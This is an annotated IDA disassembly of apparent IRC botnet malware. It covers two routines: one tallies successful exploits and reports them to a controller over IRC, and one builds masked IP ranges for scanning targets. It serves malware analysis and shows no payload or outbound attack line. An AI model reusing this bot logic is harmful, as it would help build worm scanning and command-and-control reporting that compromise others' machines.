seg000:00401000 ;
seg000:00401000 ; +-------------------------------------------------------------------------+
seg000:00401000 ;      This file is generated by The Interactive Disassembler (IDA)        
seg000:00401000 ;      Copyright (c) 2005 by DataRescue sa/nv, <ida@datarescue.com>        
seg000:00401000 ;             Licensed to: Sebastian Porst, 1 user std, 05/2005            
seg000:00401000 ; +-------------------------------------------------------------------------+
seg000:00401000 ;
seg000:00401000 ; Format      : Portable executable for 80386 (PE)
seg000:00401000 ; Imagebase   : 400000
seg000:00401000 ; Section 1. (virtual address 00001000)
seg000:00401000 ; Virtual size                  : 00016000 (  90112.)
seg000:00401000 ; Section size in file          : 00016000 (  90112.)
seg000:00401000 ; Offset to raw data for section: 00001000
seg000:00401000 ; Flags C0000040: Data Readable Writable
seg000:00401000 ; Alignment     : default
seg000:00401000
seg000:00401000
seg000:00401000 unicode         macro page,string,zero
seg000:00401000                 irpc c,<string>
seg000:00401000                 db '&c', page
seg000:00401000                 endm
seg000:00401000                 ifnb <zero>
seg000:00401000                 dw zero
seg000:00401000                 endif
seg000:00401000 endm
seg000:00401000
seg000:00401000                 .686p
seg000:00401000                 .mmx
seg000:00401000                 .model flat
seg000:00401000
seg000:00401000 ; ---------------------------------------------------------------------------
seg000:00401000
seg000:00401000 ; Segment type: Pure code
seg000:00401000 ; Segment permissions: Read/Write
seg000:00401000 seg000          segment para public 'DATA' use32
seg000:00401000                 assume cs:seg000
seg000:00401000                 ;org 401000h
seg000:00401000                 assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
seg000:00401000
seg000:00401000 ;  S U B R O U T I N E 
seg000:00401000
seg000:00401000 ; Tally up the number of exploits executed. If the total number of exploits exceeds a certain threshold a user on IRC is messaged.
seg000:00401000 ; @param conn An IRC connection
seg000:00401000 ; @param target An IRC nick
seg000:00401000 ; @param verbose Switches on verbose mode
seg000:00401000 ; @param total Exploit threshold
seg000:00401000 ; @return -
seg000:00401000 ;
seg000:00401000 ; Attributes: bp-based frame
seg000:00401000
seg000:00401000 ListExploitStats proc near              ; CODE XREF: IRC_CommandParse+2B37p
seg000:00401000
seg000:00401000 var_410         = dword ptr -410h
seg000:00401000 var_20C         = dword ptr -20Ch
seg000:00401000 var_8           = dword ptr -8
seg000:00401000 var_4           = dword ptr -4
seg000:00401000 conn            = dword ptr  8
seg000:00401000 target          = dword ptr  0Ch
seg000:00401000 verbose         = dword ptr  10h
seg000:00401000 total           = dword ptr  14h
seg000:00401000
seg000:00401000                 push    ebp
seg000:00401001                 mov     ebp, esp
seg000:00401003                 sub     esp, 410h
seg000:00401009                 and     [ebp+var_8], 0
seg000:0040100D                 push    ebx
seg000:0040100E                 push    esi
seg000:0040100F                 mov     esi, ds:sprintf
seg000:00401015                 push    edi
seg000:00401016                 push    offset aScan    ; "SCAN//"
seg000:0040101B                 lea     eax, [ebp+var_20C]
seg000:00401021                 push    offset aSExploitStatis ; "%s Exploit Statistics:"
seg000:00401026                 push    eax
seg000:00401027                 call    esi
seg000:00401029                 mov     edi, ds:strncat
seg000:0040102F                 add     esp, 0Ch
seg000:00401032                 cmp     ds:exploit.port, 0
seg000:00401039                 mov     ebx, 202h
seg000:0040103E                 jz      short loc_401093
seg000:00401040                 mov     [ebp+var_4], offset exploit.name
seg000:00401047
seg000:00401047 @This loop sums up the exploit stats
seg000:00401047
seg000:00401047 loc_401047:                             ; CODE XREF: ListExploitStats+91j
seg000:00401047                 push    offset aBanner  ; "banner"
seg000:0040104C                 push    [ebp+var_4]
seg000:0040104F                 call    ds:dword_4170D0
seg000:00401055                 test    eax, eax
seg000:00401057                 jz      short loc_401086
seg000:00401059                 mov     ecx, [ebp+var_4]
seg000:0040105C                 mov     eax, [ecx+29h]
seg000:0040105F                 add     [ebp+var_8], eax
seg000:00401062                 push    eax
seg000:00401063                 push    ecx
seg000:00401064                 lea     eax, [ebp+var_410]
seg000:0040106A                 push    offset aSD      ; " %s: %d,"
seg000:0040106F                 push    eax
seg000:00401070                 call    esi
seg000:00401072                 lea     eax, [ebp+var_410]
seg000:00401078                 push    ebx
seg000:00401079                 push    eax
seg000:0040107A                 lea     eax, [ebp+var_20C]
seg000:00401080                 push    eax
seg000:00401081                 call    edi
seg000:00401083                 add     esp, 1Ch
seg000:00401086
seg000:00401086 loc_401086:                             ; CODE XREF: ListExploitStats+57j
seg000:00401086                 add     [ebp+var_4], 40h
seg000:0040108A                 mov     eax, [ebp+var_4]
seg000:0040108D                 cmp     dword ptr [eax+21h], 0
seg000:00401091                 jnz     short loc_401047
seg000:00401093
seg000:00401093 loc_401093:                             ; CODE XREF: ListExploitStats+3Ej
seg000:00401093                 push    0
seg000:00401095                 push    ds:dword_43D044
seg000:0040109B                 call    ds:dword_4170D0
seg000:004010A1                 push    eax
seg000:004010A2                 call    Uptime
seg000:004010A7                 add     esp, 0Ch
seg000:004010AA                 push    eax
seg000:004010AB                 lea     eax, [ebp+var_410]
seg000:004010B1                 push    [ebp+var_8]
seg000:004010B4                 push    ds:dword_43D000
seg000:004010BA                 push    offset aExploitFtpdDTo ; " Exploit FTPD: %d, Total: %d in %s."
seg000:004010BF                 push    eax
seg000:004010C0                 call    esi
seg000:004010C2                 lea     eax, [ebp+var_410]
seg000:004010C8                 push    ebx
seg000:004010C9                 push    eax
seg000:004010CA                 lea     eax, [ebp+var_20C]
seg000:004010D0                 push    eax
seg000:004010D1                 call    edi
seg000:004010D3                 mov     eax, [ebp+var_8]
seg000:004010D6                 add     esp, 20h
seg000:004010D9                 cmp     eax, [ebp+total]
seg000:004010DC                 pop     edi
seg000:004010DD                 pop     esi
seg000:004010DE                 pop     ebx
seg000:004010DF                 jg      short loc_4010E7
seg000:004010E1                 cmp     [ebp+verbose], 0
seg000:004010E5                 jz      short locret_4010FC
seg000:004010E7
seg000:004010E7 @Message the user if the treshold was met or verbose mode is on
seg000:004010E7
seg000:004010E7 loc_4010E7:                             ; CODE XREF: ListExploitStats+DFj
seg000:004010E7                 lea     eax, [ebp+var_20C]
seg000:004010ED                 push    eax
seg000:004010EE                 push    [ebp+target]
seg000:004010F1                 push    [ebp+conn]
seg000:004010F4                 call    IRC__privmsg
seg000:004010F9                 add     esp, 0Ch
seg000:004010FC
seg000:004010FC locret_4010FC:                          ; CODE XREF: ListExploitStats+E5j
seg000:004010FC                 leave
seg000:004010FD                 retn
seg000:004010FD ListExploitStats endp
seg000:004010FD

seg000:0040129B
seg000:0040129B ;  S U B R O U T I N E 
seg000:0040129B
seg000:0040129B ; Takes an IP address and sets some parts of it to either x or 0
seg000:0040129B ; @param ip An IP address
seg000:0040129B ; @param Random If true, parts of the IP address are replaced by 'x', otherwise by 0.
seg000:0040129B ; @param Class IP Class of the generated IP
seg000:0040129B ; @return The generated IP address
seg000:0040129B ; Attributes: bp-based frame
seg000:0040129B
seg000:0040129B MakeIP          proc near               ; CODE XREF: IRC_CommandParse+239Cp
seg000:0040129B                                         ; IRC_CommandParse+289Cp
seg000:0040129B
seg000:0040129B var_20          = dword ptr -20h
seg000:0040129B var_10          = dword ptr -10h
seg000:0040129B var_C           = dword ptr -0Ch
seg000:0040129B var_8           = dword ptr -8
seg000:0040129B arg_0           = dword ptr  8
seg000:0040129B arg_4           = dword ptr  0Ch
seg000:0040129B arg_8           = dword ptr  10h
seg000:0040129B
seg000:0040129B                 push    ebp
seg000:0040129C                 mov     ebp, esp
seg000:0040129E                 sub     esp, 20h
seg000:004012A1                 cmp     [ebp+arg_0], 0
seg000:004012A5                 push    ebx
seg000:004012A6                 push    esi
seg000:004012A7                 push    edi
seg000:004012A8                 jz      loc_4013A1
seg000:004012AE                 push    10h
seg000:004012B0                 push    0
seg000:004012B2                 push    offset unk_428944
seg000:004012B7                 call    ZeroMemory
seg000:004012BC                 push    10h
seg000:004012BE                 lea     eax, [ebp+var_20]
seg000:004012C1                 push    [ebp+arg_0]
seg000:004012C4                 push    eax
seg000:004012C5                 call    ds:dword_4171E0
seg000:004012CB                 mov     esi, ds:dword_4171E4
seg000:004012D1                 mov     edi, offset a__0 ; "."
seg000:004012D6                 lea     eax, [ebp+var_20]
seg000:004012D9                 push    edi
seg000:004012DA                 push    eax
seg000:004012DB                 call    esi
seg000:004012DD                 add     esp, 20h
seg000:004012E0                 mov     [ebp+var_10], eax
seg000:004012E3                 test    eax, eax
seg000:004012E5                 jz      loc_4013A1
seg000:004012EB                 mov     [ebp+arg_0], 1
seg000:004012F2                 lea     ebx, [ebp+var_C]
seg000:004012F5
seg000:004012F5 @Tokenize the input IP address
seg000:004012F5
seg000:004012F5 loc_4012F5:                             ; CODE XREF: MakeIP+77j
seg000:004012F5                 push    edi
seg000:004012F6                 push    0
seg000:004012F8                 call    esi
seg000:004012FA                 xor     edx, edx
seg000:004012FC                 pop     ecx
seg000:004012FD                 cmp     eax, edx
seg000:004012FF                 pop     ecx
seg000:00401300                 mov     [ebx], eax
seg000:00401302                 jz      loc_4013A1
seg000:00401308                 inc     [ebp+arg_0]
seg000:0040130B                 add     ebx, 4
seg000:0040130E                 cmp     [ebp+arg_0], 4
seg000:00401312                 jl      short loc_4012F5
seg000:00401314                 cmp     [ebp+arg_8], 1
seg000:00401318
seg000:00401318 @Create a class 1 IP
seg000:00401318
seg000:00401318                 jnz     short loc_401343
seg000:0040131A                 cmp     [ebp+arg_4], edx
seg000:0040131D                 mov     ecx, offset asc_41981C ; "x"
seg000:00401322                 mov     eax, offset a0  ; "0"
seg000:00401327                 mov     esi, ecx
seg000:00401329                 jnz     short loc_40132D
seg000:0040132B                 mov     esi, eax
seg000:0040132D
seg000:0040132D loc_40132D:                             ; CODE XREF: MakeIP+8Ej
seg000:0040132D                 cmp     [ebp+arg_4], edx
seg000:00401330                 mov     edx, ecx
seg000:00401332                 jnz     short loc_401336
seg000:00401334                 mov     edx, eax
seg000:00401336
seg000:00401336 loc_401336:                             ; CODE XREF: MakeIP+97j
seg000:00401336                 cmp     [ebp+arg_4], 0
seg000:0040133A                 jz      short loc_40133E
seg000:0040133C                 mov     eax, ecx
seg000:0040133E
seg000:0040133E loc_40133E:                             ; CODE XREF: MakeIP+9Fj
seg000:0040133E                 push    esi
seg000:0040133F                 push    edx
seg000:00401340                 push    eax
seg000:00401341                 jmp     short loc_401384
seg000:00401343 ; ---------------------------------------------------------------------------
seg000:00401343 @Create a class 2 IP
seg000:00401343
seg000:00401343 loc_401343:                             ; CODE XREF: MakeIP+7Dj
seg000:00401343                 cmp     [ebp+arg_8], 2
seg000:00401347                 jnz     short loc_401368
seg000:00401349                 cmp     [ebp+arg_4], edx
seg000:0040134C                 mov     ecx, offset asc_41981C ; "x"
seg000:00401351                 mov     eax, offset a0  ; "0"
seg000:00401356                 mov     edx, ecx
seg000:00401358                 jnz     short loc_40135C
seg000:0040135A                 mov     edx, eax
seg000:0040135C
seg000:0040135C loc_40135C:                             ; CODE XREF: MakeIP+BDj
seg000:0040135C                 cmp     [ebp+arg_4], 0
seg000:00401360                 jz      short loc_401364
seg000:00401362                 mov     eax, ecx
seg000:00401364
seg000:00401364 loc_401364:                             ; CODE XREF: MakeIP+C5j
seg000:00401364                 push    edx
seg000:00401365                 push    eax
seg000:00401366                 jmp     short loc_401381
seg000:00401368 ; ---------------------------------------------------------------------------
seg000:00401368 @Create a class 3 IP
seg000:00401368
seg000:00401368 loc_401368:                             ; CODE XREF: MakeIP+ACj
seg000:00401368                 cmp     [ebp+arg_8], 3
seg000:0040136C                 jnz     short loc_4013A1
seg000:0040136E                 cmp     [ebp+arg_4], edx
seg000:00401371                 mov     eax, offset asc_41981C ; "x"
seg000:00401376                 jnz     short loc_40137D
seg000:00401378                 mov     eax, offset a0  ; "0"
seg000:0040137D
seg000:0040137D loc_40137D:                             ; CODE XREF: MakeIP+DBj
seg000:0040137D                 push    eax
seg000:0040137E                 push    [ebp+var_8]
seg000:00401381
seg000:00401381 loc_401381:                             ; CODE XREF: MakeIP+CBj
seg000:00401381                 push    [ebp+var_C]
seg000:00401384
seg000:00401384 loc_401384:                             ; CODE XREF: MakeIP+A6j
seg000:00401384                 push    [ebp+var_10]
seg000:00401387                 push    offset aS_S_S_S ; "%s.%s.%s.%s"
seg000:0040138C                 push    offset unk_428944
seg000:00401391                 call    ds:sprintf
seg000:00401397                 add     esp, 18h
seg000:0040139A                 mov     eax, offset unk_428944
seg000:0040139F                 jmp     short loc_4013A3
seg000:004013A1 ; ---------------------------------------------------------------------------
seg000:004013A1
seg000:004013A1 loc_4013A1:                             ; CODE XREF: MakeIP+Dj
seg000:004013A1                                         ; MakeIP+4Aj ...
seg000:004013A1                 xor     eax, eax
seg000:004013A3
seg000:004013A3 loc_4013A3:                             ; CODE XREF: MakeIP+104j
seg000:004013A3                 pop     edi
seg000:004013A4                 pop     esi
seg000:004013A5                 pop     ebx
seg000:004013A6                 leave
seg000:004013A7                 retn
seg000:004013A7 MakeIP          endp
seg000:004013A7